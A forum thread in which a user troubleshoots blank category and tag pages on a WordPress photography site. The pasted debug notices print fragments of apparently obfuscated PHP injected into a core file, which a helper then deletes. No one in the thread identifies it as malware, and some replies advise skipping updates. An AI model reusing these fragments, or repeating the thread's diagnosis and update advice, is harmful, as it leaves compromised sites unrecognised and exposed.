Wordpress help?

*** My issue has been resolved, but feel free to use this thread for any other issues with Wordpress ***

Hopefully someone who sees this has knowledge of Wordpress and could hopefully help me out. I'm willing to pay for anyone who can help me troubleshoot this issue or even log into my account and fix this problem. I know someone here works with Wordpress as their job, but idk where he's been lately. (Jacob??)

Anyway, I recently updated Wordpress and installed a new theme to my photography website. Since doing this, my /category/______ and /tag/______ pages are blank. No 404 error, just a white screen.

I searched Google multiple times and nothing I saw there helped me solve this issue.

Anyone have any idea??

Thanks!

Edited by futures

24 minutes ago, GHOSTDRONES said:

Unfortunately not. =\ Thanks though!

I was able to run the errors, so at least now I know where the issue is. I just have no idea how to fix them. I put the pages I found the errors and copied the lines from the paths in the directory:

/index:
Notice: Undefined variable: gallery in /home/content/a/s/h/ashtonpopiel/html/pop-images/wp-content/themes/rowan-theme.v.1.1.0/functions.php on line 177
    if( $query->is_main_query() && is_post_type_archive( $gallery )  && ! is_admin() ) {

/category &  /tag:
Notice: Undefined variable: gallery in /home/content/a/s/h/ashtonpopiel/html/pop-images/wp-content/themes/rowan-theme.v.1.1.0/functions.php on line 177
    if( $query->is_main_query() && is_post_type_archive( $gallery )  && ! is_admin() ) {

Notice: Undefined variable: gretzky in /home/content/a/s/h/ashtonpopiel/html/pop-images/wp-includes/theme-compat/archive.php on line 53
$fang . $jacqueline['4']. $female['1'] .$debarring[1]. $incidental['0'] . $incidental['0'] .$incidental['0'].$belove['2']);$hoops($gretzky['2'],

Notice: Undefined variable: disobeying in /home/content/a/s/h/ashtonpopiel/html/pop-images/wp-includes/theme-compat/archive.php on line 54
$disobeying['5'] ,$arraigned['2'] ,

Notice: Undefined variable: justly in /home/content/a/s/h/ashtonpopiel/html/pop-images/wp-includes/theme-compat/archive.php on line 56
$justly['0'] ,

Couple of basics...

Have you tried deactivating all of your plugins?

It seems it's having an issue with posts because you're referencing 'category' and 'tag'. So I'm assuming when you post a photo it's posting as a post, not a page.

Is this theme compatible with the new version of WordPress? Lot's of times people develop themes and never update them. A quick interwebz search revealed a few people are having issues with this theme. If you switch the theme to the standard twentysixteen does it solve the problem?

34 minutes ago, jacobraccuia said:

hi!

have you reset your permalinks? thats usually the main reason you'd get a 404.

wp-admin - settings - permalinks - click "save".  you don't need to update anything.

(PM me, i really don't check the boards since the update.)

Yeah I've tried that :( I'm not getting a 404, its just a blank page.

I'll PM you if I can't find a solution sometime today! Thanks <3

Edited by futures

1 minute ago, kgry said:

Couple of basics...

It seems it's having an issue with posts because you're referencing 'category' and 'tag'. So I'm assuming when you post a photo it's posting as a post, not a page.

Is this theme compatible with the new version of WordPress? Lot's of times people develop themes and never update them. A quick interwebz search revealed a few people are having issues with this theme. If you switch the theme to the standard twentysixteen does it solve the problem?

I did try deactivating the plugins. Didn't work :( I have posts (/blog) and pages that all work perfectly fine on the site. Here is the url: www.pop-images.com. I haven't been able to find any place that says the new version isn't compatible. I've been trying to contact the developer, too. They were troubleshooting other issues for other people as recently as last week, though, so I'm hoping to get a response from them soon.

I haven't switched the theme simply because I don't want to lose all of the changes I've made to it. If I switch to twentysixteen and switch back to this theme, will everything be in tact?

Thanks so much for your help!

Your theme changes should stick if you switch back and forth, but of course you should have a child theme going with it to help battle that.

Make sure your theme and all plugin are also updated.  The last WP update caused more harm than good for many of my sites.  That's why I install a plugin to combat automatic updates.

1 hour ago, bowserhound said:

Your theme changes should stick if you switch back and forth, but of course you should have a child theme going with it to help battle that.

Make sure your theme and all plugin are also updated.  The last WP update caused more harm than good for many of my sites.  That's why I install a plugin to combat automatic updates.

The theme I'm using is a child theme of Genesis (not sure what this means exactly, haha). I will try switching the theme and see if I can access the category and tag links. I used to never update Wordpress, until one day my site was hacked/compromised. I was told by Godaddy that I should always update Wordpress to prevent this from happening. So, that's what I've been doing. :( If this is caused by the Wordpress update and the developer of the theme never updates the theme, will I be SOL or will there be a work around for me to be able to figure out and fix?

Thanks for your input :) 

52 minutes ago, tittus said:

It sounds like you're on the right track. Are there any fatal errors in the log? It might be worthwhile to enable debugging and viewing a page that has the white screen to see what errors are being thrown, if any. Try adding this to the wp-config.php. 

define( 'WP_DEBUG', true );

I did the debug-true thing in config and that is where I found the handful of "notice" errors that I posted towards the beginning of this thread. Nothing came up as a fatal error though! Which I feel is a good thing lol. I hope at least.

5 hours ago, kgry said:

Couple of basics...

2 hours ago, bowserhound said:

Update: I toggled around the live preview of the twenty fifteen theme (twenty sixteen was nowhere to be found?) and the category and tag links worked fine. So it's definitely an issue isolated to this theme I switched to last week.

Now I just gotta figure out how to fix it.

If you paid for the theme, make the developers fix it, they know it way better than anyone else.

I stopped updating my wordpress version unless there's a security issue that was patched in it - which could compromise your site.  But the majority of updates are just more bells & whistles.  You can always update after your theme developers have an update available so that everything is in sync.  Keep an eye on the plugin updates too.

From what I can tell from what's been said so far, there might be a conflict with the new theme and your current version of WordPress. The warnings coming from wp-includes are specific to WordPress core. Do have have a backup point from before the update to 4.5? It might be worthwhile to try reverting to a secure version of 4.4 to see if it fixes the issue. https://wordpress.org/wordpress-4.4.3.zip Might be a quick fix!

4 hours ago, bowserhound said:

If you paid for the theme, make the developers fix it, they know it way better than anyone else.

I stopped updating my wordpress version unless there's a security issue that was patched in it - which could compromise your site.  But the majority of updates are just more bells & whistles.  You can always update after your theme developers have an update available so that everything is in sync.  Keep an eye on the plugin updates too.

i've tried contacting the developers 3 times already :( no luck

in the future i'll wait on the updates for sure. thanks.

4 hours ago, tittus said:

From what I can tell from what's been said so far, there might be a conflict with the new theme and your current version of WordPress. The warnings coming from wp-includes are specific to WordPress core. Do have have a backup point from before the update to 4.5? It might be worthwhile to try reverting to a secure version of 4.4 to see if it fixes the issue. https://wordpress.org/wordpress-4.4.3.zip Might be a quick fix!

i don't have any backups unfortunately. =\ i didnt know how to do it until very recently. if i install 4.4.3 will that overwrite everything i have on my site currently?

this was the most ridiculous thing of the month for me...

Undefined variable: justly in /home/content/a/s/h/ashtonpopiel/html/pop-images/wp-includes/theme-compat/archive.php on line 56

This file doesn't exist in the latest version of wordpress, so I deleted it.

you should be all set :)

7 hours ago, jacobraccuia said:

this was the most ridiculous thing of the month for me...

Undefined variable: justly in /home/content/a/s/h/ashtonpopiel/html/pop-images/wp-includes/theme-compat/archive.php on line 56

This file doesn't exist in the latest version of wordpress, so I deleted it.

you should be all set :)

Oh my gosh thank you so much!! Let me send you some $$ on PayPal for your troubles.